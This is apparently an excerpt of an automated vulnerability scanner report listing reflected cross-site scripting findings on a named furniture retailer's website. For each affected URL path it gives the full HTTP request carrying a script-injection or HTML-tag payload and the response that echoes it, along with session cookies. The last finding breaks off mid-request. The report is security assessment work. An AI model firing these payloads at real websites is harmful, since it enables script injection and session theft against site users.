<!--[if lt IE 7 ]> <html xmlns="http://www.w3.org/1999/xhtml" version="-//W3C//DTD XHTML 1.1//
...[SNIP]...
<link rel="canonical" href="http://www.hertzfurniture.com/cart.php471bc"><script>alert(1)</script>422ffc091eb/1'" />
...[SNIP]...

3.382. http://www.hertzfurniture.com/cart.php/1' [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hertzfurniture.com
Path:   /cart.php/1'

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f0de7<a>588021ee9a7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /cart.phpf0de7<a>588021ee9a7/1' HTTP/1.1
Host: www.hertzfurniture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: IPE35522=IPE35522; __utmx=1.00015598742331623501:2:3; __utmxx=1.00015598742331623501:1317384855:2592000; HER001-FE2_var=d; cartId=31f312284fec0a02f7a8e5e805e7d277; SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.20.9.1317384906131; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1; kmCheck=e2cab9cacd26447c8458e2fa0b603377; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|burp|Raw Query not available; WRUID=410325474.977200202

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 30 Sep 2011 12:35:58 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384e53155c88b649bd6; path=/
Vary: User-Agent
Content-Length: 11934

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
   "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">


<!--[if lt IE 7 ]> <html xmlns="http://www.w3.org/1999/xhtml" version="-//W3C//DTD XHTML 1.1//
...[SNIP]...
<div class="url">The requested URL www.hertzfurniture.com/cart.phpf0de7<a>588021ee9a7 1' doesn't exist.</div>
...[SNIP]...

3.383. http://www.hertzfurniture.com/cart.php/1' [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hertzfurniture.com
Path:   /cart.php/1'

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 21a6d<a>696843c7ff6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /cart.php/1'21a6d<a>696843c7ff6 HTTP/1.1
Host: www.hertzfurniture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: IPE35522=IPE35522; __utmx=1.00015598742331623501:2:3; __utmxx=1.00015598742331623501:1317384855:2592000; HER001-FE2_var=d; cartId=31f312284fec0a02f7a8e5e805e7d277; SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.20.9.1317384906131; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1; kmCheck=e2cab9cacd26447c8458e2fa0b603377; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|burp|Raw Query not available; WRUID=410325474.977200202

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 30 Sep 2011 12:05:29 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384e53155c88b649bd6; path=/
Vary: User-Agent
Content-Length: 11934

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
   "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">


<!--[if lt IE 7 ]> <html xmlns="http://www.w3.org/1999/xhtml" version="-//W3C//DTD XHTML 1.1//
...[SNIP]...
<div class="url">The requested URL www.hertzfurniture.com/cart.php 1'21a6d<a>696843c7ff6 doesn't exist.</div>
...[SNIP]...

3.384. http://www.hertzfurniture.com/cart.php/1' [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hertzfurniture.com
Path:   /cart.php/1'

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ffc67"><script>alert(1)</script>7677760fccf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cart.php/1'ffc67"><script>alert(1)</script>7677760fccf HTTP/1.1
Host: www.hertzfurniture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: IPE35522=IPE35522; __utmx=1.00015598742331623501:2:3; __utmxx=1.00015598742331623501:1317384855:2592000; HER001-FE2_var=d; cartId=31f312284fec0a02f7a8e5e805e7d277; SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.20.9.1317384906131; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1; kmCheck=e2cab9cacd26447c8458e2fa0b603377; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|burp|Raw Query not available; WRUID=410325474.977200202

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 30 Sep 2011 12:05:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384e53155c88b649bd6; path=/
Vary: User-Agent
Content-Length: 11982

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
   "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">


<!--[if lt IE 7 ]> <html xmlns="http://www.w3.org/1999/xhtml" version="-//W3C//DTD XHTML 1.1//
...[SNIP]...
<link rel="canonical" href="http://www.hertzfurniture.com/cart.php/1'ffc67"><script>alert(1)</script>7677760fccf" />
...[SNIP]...

3.385. http://www.hertzfurniture.com/church-furniture.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hertzfurniture.com
Path:   /church-furniture.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1b20"><script>alert(1)</script>2193666e451 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /church-furniture.htmlc1b20"><script>alert(1)</script>2193666e451 HTTP/1.1
Host: www.hertzfurniture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hertzfurniture.com/cart.php
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: IPE35522=IPE35522; __utmx=1.00015598742331623501:2:3; __utmxx=1.00015598742331623501:1317384855:2592000; HER001-FE2_var=d; SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; cartId=31f312284fec0a02f7a8e5e805e7d277; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.15.9.1317384846493; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1; kmCheck=0e3162c350804bc1b5f8f35069f28142; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|burp|Raw Query not available; WRUID=410325474.977200202

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 30 Sep 2011 12:35:48 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384e53155c88b649bd6; path=/
Vary: User-Agent
Content-Length: 12002

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
   "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">


<!--[if lt IE 7 ]> <html xmlns="http://www.w3.org/1999/xhtml" version="-//W3C//DTD XHTML 1.1//
...[SNIP]...
<link rel="canonical" href="http://www.hertzfurniture.com/church-furniture.htmlc1b20"><script>alert(1)</script>2193666e451" />
...[SNIP]...

3.386. http://www.hertzfurniture.com/church-furniture.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hertzfurniture.com
Path:   /church-furniture.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 287f2<a>6d0fd0479bd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /church-furniture.html287f2<a>6d0fd0479bd HTTP/1.1
Host: www.hertzfurniture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hertzfurniture.com/cart.php
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: IPE35522=IPE35522; __utmx=1.00015598742331623501:2:3; __utmxx=1.00015598742331623501:1317384855:2592000; HER001-FE2_var=d; SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; cartId=31f312284fec0a02f7a8e5e805e7d277; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.15.9.1317384846493; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1; kmCheck=0e3162c350804bc1b5f8f35069f28142; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|burp|Raw Query not available; WRUID=410325474.977200202

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 30 Sep 2011 12:05:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384e53155c88b649bd6; path=/
Vary: User-Agent
Content-Length: 11954

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
   "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">


<!--[if lt IE 7 ]> <html xmlns="http://www.w3.org/1999/xhtml" version="-//W3C//DTD XHTML 1.1//
...[SNIP]...
<div class="url">The requested URL www.hertzfurniture.com/church furniture.html287f2<a>6d0fd0479bd doesn't exist.</div>
...[SNIP]...

3.387. http://www.hertzfurniture.com/css/ie.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hertzfurniture.com
Path:   /css/ie.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cabf0"><script>alert(1)</script>4a2a3d4ad2b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/ie.csscabf0"><script>alert(1)</script>4a2a3d4ad2b?v=1.0 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.hertzfurniture.com

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 30 Sep 2011 12:32:44 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN49ef2d0a88e46=ra1kqbcn3svcs5uh2khg9rlmq5; path=/
X-UA-Compatible: IE=Edge,chrome=1
Vary: User-Agent
Content-Length: 11980

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
   "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">


<!--[if lt IE 7 ]> <html xmlns="http://www.w3.org/1999/xhtml" version="-//W3C//DTD XHTML 1.1//
...[SNIP]...
<link rel="canonical" href="http://www.hertzfurniture.com/css/ie.csscabf0"><script>alert(1)</script>4a2a3d4ad2b" />
...[SNIP]...

3.388. http://www.hertzfurniture.com/css/ie.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hertzfurniture.com
Path:   /css/ie.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 622b0<a>72d0ba4ff3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /css/ie.css622b0<a>72d0ba4ff3?v=1.0 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.hertzfurniture.com

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 30 Sep 2011 12:02:01 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN49ef2d0a88e46=ra1kqbcn3svcs5uh2khg9rlmq5; path=/
X-UA-Compatible: IE=Edge,chrome=1
Vary: User-Agent
Content-Length: 11930

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
   "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">


<!--[if lt IE 7 ]> <html xmlns="http://www.w3.org/1999/xhtml" version="-//W3C//DTD XHTML 1.1//
...[SNIP]...
<div class="url">The requested URL www.hertzfurniture.com/css ie.css622b0<a>72d0ba4ff3 doesn't exist.</div>
...[SNIP]...

3.389. http://www.hertzfurniture.com/css/ie7.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hertzfurniture.com
Path:   /css/ie7.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d918"><script>alert(1)</script>6766ec5650a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/ie7.css3d918"><script>alert(1)</script>6766ec5650a?v=1.10 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.hertzfurniture.com

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 30 Sep 2011 12:33:43 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384f20b9ffb48ea05c5; path=/
X-UA-Compatible: IE=Edge,chrome=1
Vary: User-Agent
Content-Length: 11982

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
   "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">


<!--[if lt IE 7 ]> <html xmlns="http://www.w3.org/1999/xhtml" version="-//W3C//DTD XHTML 1.1//
...[SNIP]...
<link rel="canonical" href="http://www.hertzfurniture.com/css/ie7.css3d918"><script>alert(1)</script>6766ec5650a" />
...[SNIP]...

3.390. http://www.hertzfurniture.com/css/ie7.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hertzfurniture.com
Path:   /css/ie7.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c23a5<a>683866ed79 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /css/ie7.cssc23a5<a>683866ed79?v=1.10 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.hertzfurniture.com

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 30 Sep 2011 12:03:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; path=/
X-UA-Compatible: IE=Edge,chrome=1
Vary: User-Agent
Content-Length: 11932

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
   "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">


<!--[if lt IE 7 ]> <html xmlns="http://www.w3.org/1999/xhtml" version="-//W3C//DTD XHTML 1.1//
...[SNIP]...
<div class="url">The requested URL www.hertzfurniture.com/css ie7.cssc23a5<a>683866ed79 doesn't exist.</div>
...[SNIP]...

3.391. http://www.hertzfurniture.com/css/jqModalDef.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hertzfurniture.com
Path:   /css/jqModalDef.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b9ce4<a>ddb5eb40b1d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /css/jqModalDef.cssb9ce4<a>ddb5eb40b1d?v=1.0 HTTP/1.1
Host: www.hertzfurniture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.hertzfurniture.com/Library-Chairs--Educational-Edge-Wood-Chair-in-Natural--3759--mo.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: IPE35522=IPE35522; WRUID=410325474.977200202; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.12.9.1317384846493; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1; kmCheck=0e3162c350804bc1b5f8f35069f28142; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|burp|Raw Query not available; SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 30 Sep 2011 12:33:09 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384118649ca5f79dcac; path=/
Vary: User-Agent
Content-Length: 11948

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
   "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">


<!--[if lt IE 7 ]> <html xmlns="http://www.w3.org/1999/xhtml" version="-//W3C//DTD XHTML 1.1//
...[SNIP]...
<div class="url">The requested URL www.hertzfurniture.com/css jqModalDef.cssb9ce4<a>ddb5eb40b1d doesn't exist.</div>
...[SNIP]...

3.392. http://www.hertzfurniture.com/css/jqModalDef.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hertzfurniture.com
Path:   /css/jqModalDef.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f042"><script>alert(1)</script>b8a07902a78 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/jqModalDef.css1f042"><script>alert(1)</script>b8a07902a78?v=1.0 HTTP/1.1
Host: www.hertzfurniture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.hertzfurniture.com/Library-Chairs--Educational-Edge-Wood-Chair-in-Natural--3759--mo.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: IPE35522=IPE35522; WRUID=410325474.977200202; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.12.9.1317384846493; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1; kmCheck=0e3162c350804bc1b5f8f35069f28142; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|burp|Raw Query not available; SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 30 Sep 2011 12:02:25 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384118649ca5f79dcac; path=/
Vary: User-Agent
Content-Length: 11996

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
   "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">


<!--[if lt IE 7 ]> <html xmlns="http://www.w3.org/1999/xhtml" version="-//W3C//DTD XHTML 1.1//
...[SNIP]...
<link rel="canonical" href="http://www.hertzfurniture.com/css/jqModalDef.css1f042"><script>alert(1)</script>b8a07902a78" />
...[SNIP]...

3.393. http://www.hertzfurniture.com/css/livebar.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hertzfurniture.com
Path:   /css/livebar.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7acf7"><script>alert(1)</script>1527c3eba87 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/livebar.css7acf7"><script>alert(1)</script>1527c3eba87?v=1.0 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.hertzfurniture.com

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 30 Sep 2011 12:32:37 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN49ef2d0a88e46=ra1kqbcn3svcs5uh2khg9rlmq5; path=/
X-UA-Compatible: IE=Edge,chrome=1
Vary: User-Agent
Content-Length: 11990

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
   "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">


<!--[if lt IE 7 ]> <html xmlns="http://www.w3.org/1999/xhtml" version="-//W3C//DTD XHTML 1.1//
...[SNIP]...
<link rel="canonical" href="http://www.hertzfurniture.com/css/livebar.css7acf7"><script>alert(1)</script>1527c3eba87" />
...[SNIP]...

3.394. http://www.hertzfurniture.com/css/livebar.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hertzfurniture.com
Path:   /css/livebar.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1f7b6<a>ab28509deab was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /css/livebar.css1f7b6<a>ab28509deab?v=1.0 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
